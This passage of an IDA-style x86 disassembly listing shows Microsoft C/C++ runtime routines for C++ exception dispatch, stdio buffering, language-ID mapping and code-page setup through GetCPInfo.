var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0041A30B SIZE 00000003 BYTES
push 40h
push offset stru_4294F8
call __SEH_prolog
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_20], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_2C]
push eax
call sub_41560A
pop ecx
pop ecx
mov [ebp+var_30], eax
call sub_416C45
mov eax, [eax+78h]
mov [ebp+var_34], eax
call sub_416C45
mov eax, [eax+7Ch]
mov [ebp+var_38], eax
call sub_416C45
mov [eax+78h], esi
call sub_416C45
mov ecx, [ebp+arg_8]
mov [eax+7Ch], ecx
and [ebp+ms_exc.disabled], 0
mov [ebp+ms_exc.disabled], 1
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_41569F
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp loc_41A2F9
; ---------------------------------------------------------------------------
loc_41A256: ; DATA XREF: .rdata:00429508�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41A28E
mov eax, [ebp+var_3C]
cmp dword ptr [eax+10h], 3
jnz short loc_41A28E
mov eax, [ebp+var_3C]
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41A28E
mov eax, [ebp+var_3C]
cmp dword ptr [eax+1Ch], 0
mov [ebp+var_40], 1
jz short loc_41A295
loc_41A28E: ; CODE XREF: sub_41A1D1+96�j
; sub_41A1D1+9F�j ...
mov [ebp+var_40], 0
loc_41A295: ; CODE XREF: sub_41A1D1+BB�j
mov eax, [ebp+var_40]
retn
; ---------------------------------------------------------------------------
loc_41A299: ; DATA XREF: .rdata:0042950C�o
mov esp, [ebp+ms_exc.old_esp]
mov ecx, [ebp+arg_C]
mov eax, [ecx+8]
mov [ebp+var_44], eax
mov edi, [ebp+arg_4]
mov eax, [edi+8]
mov [ebp+var_48], eax
mov edx, [ecx+10h]
mov [ebp+var_4C], edx
xor edx, edx
loc_41A2B6: ; CODE XREF: sub_41A1D1+13B�j
mov [ebp+var_50], edx
cmp edx, [ecx+0Ch]
jnb short loc_41A2E2
lea esi, [edx+edx*4]
mov ebx, [ebp+var_4C]
lea esi, [ebx+esi*4]
mov ebx, [esi+4]
cmp eax, ebx
jle short loc_41A30B
cmp eax, [esi+8]
jg short loc_41A30B
lea eax, [ebx+1]
mov [ebp+var_48], eax
mov edx, [ebp+var_44]
mov eax, [edx+eax*8]
mov [ebp+var_48], eax
loc_41A2E2: ; CODE XREF: sub_41A1D1+EB�j
push eax
push ecx
xor esi, esi
push esi
push edi
call sub_41A0A1
add esp, 10h
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov esi, [ebp+arg_0]
loc_41A2F9: ; CODE XREF: sub_41A1D1+80�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A314
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41A1D1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41A1D1
loc_41A30B: ; CODE XREF: sub_41A1D1+FB�j
; sub_41A1D1+100�j
inc edx
jmp short loc_41A2B6
; END OF FUNCTION CHUNK FOR sub_41A1D1
; =============== S U B R O U T I N E =======================================
sub_41A30E proc near ; DATA XREF: .rdata:stru_4294F8�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_41A30E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A314 proc near ; CODE XREF: sub_41A1D1+12C�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-30h]
call sub_415653
pop ecx
call sub_416C45
mov ecx, [ebp-34h]
mov [eax+78h], ecx
call sub_416C45
mov ecx, [ebp-38h]
mov [eax+7Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_41A377
cmp dword ptr [esi+10h], 3
jnz short locret_41A377
cmp dword ptr [esi+14h], 19930520h
jnz short locret_41A377
cmp dword ptr [ebp-20h], 0
jnz short locret_41A377
cmp dword ptr [ebp-1Ch], 0
jz short locret_41A377
push dword ptr [esi+18h]
call sub_415632
pop ecx
test eax, eax
jz short locret_41A377
call sub_41584A
push eax
push esi
call sub_41A16F
pop ecx
pop ecx
locret_41A377: ; CODE XREF: sub_41A314+2B�j
; sub_41A314+31�j ...
retn
sub_41A314 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A378 proc near ; CODE XREF: sub_41A4F4+D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 8
push offset stru_429510
call __SEH_prolog
mov esi, ecx
mov eax, [ebp+arg_4]
mov edi, edx
mov ebx, [ebp+arg_0]
mov ecx, [eax+4]
test ecx, ecx
jz loc_41A4E2
cmp byte ptr [ecx+8], 0
jz loc_41A4E2
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_41A3B4
test byte ptr [eax+3], 80h
jz loc_41A4E2
loc_41A3B4: ; CODE XREF: sub_41A378+30�j
mov eax, [eax]
test eax, eax
js short loc_41A3BE
lea edi, [ecx+edi+0Ch]
loc_41A3BE: ; CODE XREF: sub_41A378+40�j
and [ebp+ms_exc.disabled], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_41A400
call sub_41E1A5
pop ecx
pop ecx
test eax, eax
jz loc_41A4D9
push 1
push edi
call sub_41E1C1
pop ecx
pop ecx
test eax, eax
jz loc_41A4D9
mov eax, [ebx+18h]
mov [edi], eax
loc_41A3F1: ; CODE XREF: sub_41A378+D1�j
lea ecx, [esi+8]
call sub_41A1B4
mov [edi], eax
jmp loc_41A4DE
; ---------------------------------------------------------------------------
loc_41A400: ; CODE XREF: sub_41A378+51�j
test byte ptr [esi], 1
jz short loc_41A44B
call sub_41E1A5
pop ecx
pop ecx
test eax, eax
jz loc_41A4D9
push 1
push edi
call sub_41E1C1
pop ecx
pop ecx
test eax, eax
jz loc_41A4D9
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41D050
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41A4DE
mov eax, [edi]
test eax, eax
jz loc_41A4DE
jmp short loc_41A3F1
; ---------------------------------------------------------------------------
loc_41A44B: ; CODE XREF: sub_41A378+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_41A484
call sub_41E1A5
pop ecx
pop ecx
test eax, eax
jz short loc_41A4D9
push 1
push edi
call sub_41E1C1
pop ecx
pop ecx
test eax, eax
jz short loc_41A4D9
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_41A1B4
push eax
push edi
call sub_41D050
add esp, 0Ch
jmp short loc_41A4DE
; ---------------------------------------------------------------------------
loc_41A484: ; CODE XREF: sub_41A378+D7�j
call sub_41E1A5
pop ecx
pop ecx
test eax, eax
jz short loc_41A4D9
push 1
push edi
call sub_41E1C1
pop ecx
pop ecx
test eax, eax
jz short loc_41A4D9
push dword ptr [esi+18h]
call sub_41E1DD
pop ecx
test eax, eax
jz short loc_41A4D9
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_41A4C8
push 1
call sub_41A1B4
push eax
push dword ptr [esi+18h]
push edi
call sub_41546C
jmp short loc_41A4DE
; ---------------------------------------------------------------------------
loc_41A4C8: ; CODE XREF: sub_41A378+13B�j
call sub_41A1B4
push eax
push dword ptr [esi+18h]
push edi
call sub_41546C
jmp short loc_41A4DE
; ---------------------------------------------------------------------------
loc_41A4D9: ; CODE XREF: sub_41A378+5C�j
; sub_41A378+6E�j ...
call sub_41A8D4
loc_41A4DE: ; CODE XREF: sub_41A378+83�j
; sub_41A378+C1�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41A4E2: ; CODE XREF: sub_41A378+1B�j
; sub_41A378+25�j ...
call __SEH_epilog
retn
sub_41A378 endp
; =============== S U B R O U T I N E =======================================
sub_41A4E8 proc near ; DATA XREF: .rdata:stru_429510�o
xor eax, eax
inc eax
retn
sub_41A4E8 endp
; ---------------------------------------------------------------------------
loc_41A4EC: ; DATA XREF: .rdata:stru_429510�o
mov esp, [ebp-18h]
jmp sub_41A89F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A4F4 proc near ; CODE XREF: sub_41A55B+A2�p
; sub_41A61B+17D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_41A508
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_41A378
pop ecx
pop ecx
loc_41A508: ; CODE XREF: sub_41A4F4+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_41A514
push esi
jmp short loc_41A517
; ---------------------------------------------------------------------------
loc_41A514: ; CODE XREF: sub_41A4F4+1B�j
push [ebp+arg_14]
loc_41A517: ; CODE XREF: sub_41A4F4+1E�j
call sub_415473
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_41A0A1
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_41A1D1
add esp, 28h
test eax, eax
jz short loc_41A559
push esi
push eax
call sub_41543C
loc_41A559: ; CODE XREF: sub_41A4F4+5C�j
pop ebp
retn
sub_41A4F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A55B proc near ; CODE XREF: sub_41A61B+1D3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_41A618
call sub_416C45
cmp dword ptr [eax+74h], 0
jz short loc_41A59A
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4156F0
add esp, 1Ch
test eax, eax
jnz short loc_41A618
loc_41A59A: ; CODE XREF: sub_41A55B+1E�j
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_415590
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_41A617
push ebx
loc_41A5C0: ; CODE XREF: sub_41A55B+B9�j
cmp esi, [edi]
jl short loc_41A608
cmp esi, [edi+4]
jg short loc_41A608
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41A5E1
cmp byte ptr [ecx+8], 0
jnz short loc_41A608
loc_41A5E1: ; CODE XREF: sub_41A55B+7E�j
mov esi, [ebp+arg_4]
push 1
push [ebp+arg_1C]
lea ebx, [eax-10h]
push [ebp+arg_18]
xor ecx, ecx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41A4F4
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_41A608: ; CODE XREF: sub_41A55B+67�j
; sub_41A55B+6C�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_41A5C0
pop ebx
loc_41A617: ; CODE XREF: sub_41A55B+62�j
pop edi
loc_41A618: ; CODE XREF: sub_41A55B+F�j
; sub_41A55B+3D�j
pop esi
leave
retn
sub_41A55B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A61B proc near ; CODE XREF: sub_41A7FD+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
and byte ptr [ebp+var_1C], 0
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jl short loc_41A63B
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41A640
loc_41A63B: ; CODE XREF: sub_41A61B+16�j
call sub_41A8D4
loc_41A640: ; CODE XREF: sub_41A61B+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_41A7D2
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz short loc_41A6CC
cmp [ebx+14h], edi
jnz short loc_41A6CC
cmp dword ptr [ebx+1Ch], 0
jnz short loc_41A6CC
call sub_416C45
cmp dword ptr [eax+78h], 0
jz loc_41A7CA
call sub_416C45
mov esi, [eax+78h]
mov [ebp+arg_0], esi
call sub_416C45
mov eax, [eax+7Ch]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_1C], 1
call sub_41E1A5
test eax, eax
pop ecx
pop ecx
jnz short loc_41A6A4
call sub_41A8D4
loc_41A6A4: ; CODE XREF: sub_41A61B+82�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_41A7CF
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_41A6C9
cmp [eax+14h], edi
jnz short loc_41A6C9
cmp dword ptr [eax+1Ch], 0
jnz short loc_41A6C9
call sub_41A8D4
loc_41A6C9: ; CODE XREF: sub_41A61B+9C�j
; sub_41A61B+A1�j ...
mov ebx, [ebp+arg_0]
loc_41A6CC: ; CODE XREF: sub_41A61B+40�j
; sub_41A61B+45�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_41A7D2
cmp dword ptr [ebx+10h], 3
jnz loc_41A7D2
cmp [ebx+14h], edi
jnz loc_41A7D2
mov esi, [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_415590
mov ecx, [ebp+var_8]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jnb loc_41A7BA
jmp short loc_41A719
; ---------------------------------------------------------------------------
loc_41A716: ; CODE XREF: sub_41A61B+199�j
mov esi, [ebp+var_18]
loc_41A719: ; CODE XREF: sub_41A61B+F9�j
cmp [eax], esi
jg loc_41A7A5
cmp esi, [eax+4]
jg short loc_41A7A5
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_14], ecx
jle short loc_41A7A5
loc_41A733: ; CODE XREF: sub_41A61B+15B�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_C], edx
mov [ebp+var_10], ecx
jle short loc_41A76C
loc_41A748: ; CODE XREF: sub_41A61B+14C�j
mov eax, [ebp+var_C]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_41A034
test eax, eax
pop ecx
jnz short loc_41A77A
dec [ebp+var_10]
add [ebp+var_C], 4
cmp [ebp+var_10], eax
jg short loc_41A748
mov eax, [ebp+var_4]
loc_41A76C: ; CODE XREF: sub_41A61B+12B�j
dec [ebp+var_14]
add esi, 10h
cmp [ebp+var_14], 0
jg short loc_41A733
jmp short loc_41A7A5
; ---------------------------------------------------------------------------
loc_41A77A: ; CODE XREF: sub_41A61B+140�j
push [ebp+var_1C]
mov edi, [ebp+var_4]
push [ebp+arg_1C]
mov ecx, [ebp+var_24]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_41A4F4
mov ebx, [ebp+arg_0]
add esp, 1Ch
mov eax, edi
loc_41A7A5: ; CODE XREF: sub_41A61B+100�j
; sub_41A61B+109�j ...
inc [ebp+var_8]
mov ecx, [ebp+var_8]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jb loc_41A716
loc_41A7BA: ; CODE XREF: sub_41A61B+F3�j
cmp [ebp+arg_14], 0
jz short loc_41A7CA
push 1
push ebx
call sub_41A16F
pop ecx
pop ecx
loc_41A7CA: ; CODE XREF: sub_41A61B+56�j
; sub_41A61B+1A3�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A7CF: ; CODE XREF: sub_41A61B+8F�j
mov ebx, [ebp+arg_0]
loc_41A7D2: ; CODE XREF: sub_41A61B+31�j
; sub_41A61B+B7�j ...
cmp [ebp+arg_14], 0
jnz short loc_41A7F8
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41A55B
add esp, 20h
jmp short loc_41A7CA
; ---------------------------------------------------------------------------
loc_41A7F8: ; CODE XREF: sub_41A61B+1BB�j
jmp sub_41A89F
sub_41A61B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A7FD proc near ; CODE XREF: .text:004154E6�p
; .text:00415516�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_41A81A
call sub_41A8D4
loc_41A81A: ; CODE XREF: sub_41A7FD+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41A842
cmp dword ptr [esi+4], 0
jz short loc_41A898
cmp [ebp+arg_14], 0
jnz short loc_41A898
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41A0A1
add esp, 10h
jmp short loc_41A898
; ---------------------------------------------------------------------------
loc_41A842: ; CODE XREF: sub_41A7FD+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41A898
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41A87C
cmp [eax+14h], edi
jbe short loc_41A87C
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41A87C
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41A89B
; ---------------------------------------------------------------------------
loc_41A87C: ; CODE XREF: sub_41A7FD+51�j
; sub_41A7FD+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41A61B
add esp, 20h
loc_41A898: ; CODE XREF: sub_41A7FD+2A�j
; sub_41A7FD+30�j ...
xor eax, eax
inc eax
loc_41A89B: ; CODE XREF: sub_41A7FD+7D�j
pop edi
pop esi
pop ebp
retn
sub_41A7FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A89F proc near ; CODE XREF: sub_41A083+19�j
; .text:0041A1AF�j ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041E1F5 SIZE 00000018 BYTES
push 8
push offset stru_429520
call __SEH_prolog
call sub_416C45
cmp dword ptr [eax+6Ch], 0
jz short loc_41A8CF
and [ebp+ms_exc.disabled], 0
call sub_416C45
call dword ptr [eax+6Ch]
jmp short loc_41A8CB
; ---------------------------------------------------------------------------
loc_41A8C4: ; DATA XREF: .rdata:stru_429520�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41A8C8: ; DATA XREF: .rdata:stru_429520�o
mov esp, [ebp+ms_exc.old_esp]
loc_41A8CB: ; CODE XREF: sub_41A89F+23�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41A8CF: ; CODE XREF: sub_41A89F+15�j
jmp loc_41E1F5
sub_41A89F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8D4 proc near ; CODE XREF: sub_415590+23�p
; sub_415590:loc_4155FA�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_429530
call __SEH_prolog
mov eax, off_42DEC0
test eax, eax
jz short loc_41A8FC
and [ebp+ms_exc.disabled], 0
call eax ; sub_41A89F
jmp short loc_41A8F8
; ---------------------------------------------------------------------------
loc_41A8F1: ; DATA XREF: .rdata:stru_429530�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41A8F5: ; DATA XREF: .rdata:stru_429530�o
mov esp, [ebp+ms_exc.old_esp]
loc_41A8F8: ; CODE XREF: sub_41A8D4+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41A8FC: ; CODE XREF: sub_41A8D4+13�j
jmp sub_41A89F
sub_41A8D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A910 proc near ; CODE XREF: sub_41569F+3D�p
; sub_41A0A1+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_41586D
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41A94F
mov ecx, 2
loc_41A94F: ; CODE XREF: sub_41A910+38�j
push ecx
call sub_41586D
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41A910 endp
; =============== S U B R O U T I N E =======================================
sub_41A95C proc near ; CODE XREF: sub_415ADF+1E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41BFFF
test eax, eax
pop ecx
jz short loc_41A9E0
cmp esi, offset dword_42D9A8
jnz short loc_41A97A
xor eax, eax
jmp short loc_41A985
; ---------------------------------------------------------------------------
loc_41A97A: ; CODE XREF: sub_41A95C+18�j
cmp esi, offset dword_42D9C8
jnz short loc_41A9E0
xor eax, eax
inc eax
loc_41A985: ; CODE XREF: sub_41A95C+1C�j
inc dword_47C220
test word ptr [esi+0Ch], 10Ch
jnz short loc_41A9E0
push ebx
push edi
lea edi, ds:47C384h[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_41A9C6
push ebx
call sub_414CAD
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41A9C6
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41A9D3
; ---------------------------------------------------------------------------
loc_41A9C6: ; CODE XREF: sub_41A95C+48�j
; sub_41A95C+55�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_41A9D3: ; CODE XREF: sub_41A95C+68�j
or word ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A9E0: ; CODE XREF: sub_41A95C+10�j
; sub_41A95C+24�j ...
xor eax, eax
pop esi
retn
sub_41A95C endp
; =============== S U B R O U T I N E =======================================
sub_41A9E4 proc near ; CODE XREF: sub_415ADF+3A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_41AA0D
push esi
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41AA0C
push esi
call sub_417C02
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_41AA0C: ; CODE XREF: sub_41A9E4+10�j
pop esi
locret_41AA0D: ; CODE XREF: sub_41A9E4+5�j
retn
sub_41A9E4 endp
; =============== S U B R O U T I N E =======================================
sub_41AA0E proc near ; CODE XREF: sub_41AC67+FF�p
; sub_41AC67+149�p
sub eax, 3A4h
jz short loc_41AA37
sub eax, 4
jz short loc_41AA31
sub eax, 0Dh
jz short loc_41AA2B
dec eax
jz short loc_41AA25
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41AA25: ; CODE XREF: sub_41AA0E+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41AA2B: ; CODE XREF: sub_41AA0E+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41AA31: ; CODE XREF: sub_41AA0E+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41AA37: ; CODE XREF: sub_41AA0E+5�j
mov eax, 411h
retn
sub_41AA0E endp
; =============== S U B R O U T I N E =======================================
sub_41AA3D proc near ; CODE XREF: sub_41AC67:loc_41ADDC�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47C760
rep stosd
stosb
xor eax, eax
mov dword_47C864, eax
mov dword_47C748, eax
mov dword_47C740, eax
mov edi, offset word_47C870
stosd
stosd
stosd
pop edi
retn
sub_41AA3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA66 proc near ; CODE XREF: sub_41AC67:loc_41ADE1�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_18]
push eax
push dword_47C864
call ds:dword_4201B0 ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_41ABA6
xor eax, eax
loc_41AA9B: ; CODE XREF: sub_41AA66+3F�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_41AA9B
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_41AAEB
push ebx
lea edx, [ebp+var_11]
push edi
loc_41AABA: ; CODE XREF: sub_41AA66+81�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41AAE1
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41AAE1: ; CODE XREF: sub_41AA66+5C�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_41AABA
pop edi
pop ebx
loc_41AAEB: ; CODE XREF: sub_41AA66+4D�j
push 0
push dword_47C740
lea eax, [ebp+var_518]
push dword_47C864
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_41C3E0
push 0
push dword_47C864
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push dword_47C740
call sub_419C39
push 0
push dword_47C864
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push dword_47C740
call sub_419C39
add esp, 5Ch
xor eax, eax
loc_41AB60: ; CODE XREF: sub_41AA66+13C�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_41AB83
or byte_47C761[eax], 10h
mov cl, [ebp+eax+var_218]
loc_41AB7B: ; CODE XREF: sub_41AA66+130�j
mov byte_47C880[eax], cl
jmp short loc_41AB9F
; ---------------------------------------------------------------------------
loc_41AB83: ; CODE XREF: sub_41AA66+105�j
test cl, 2
jz short loc_41AB98
or byte_47C761[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_41AB7B
; ---------------------------------------------------------------------------
loc_41AB98: ; CODE XREF: sub_41AA66+120�j
and byte_47C880[eax], 0
loc_41AB9F: ; CODE XREF: sub_41AA66+11B�j
inc eax
cmp eax, esi
jb short loc_41AB60
jmp short loc_41ABEA
; ---------------------------------------------------------------------------
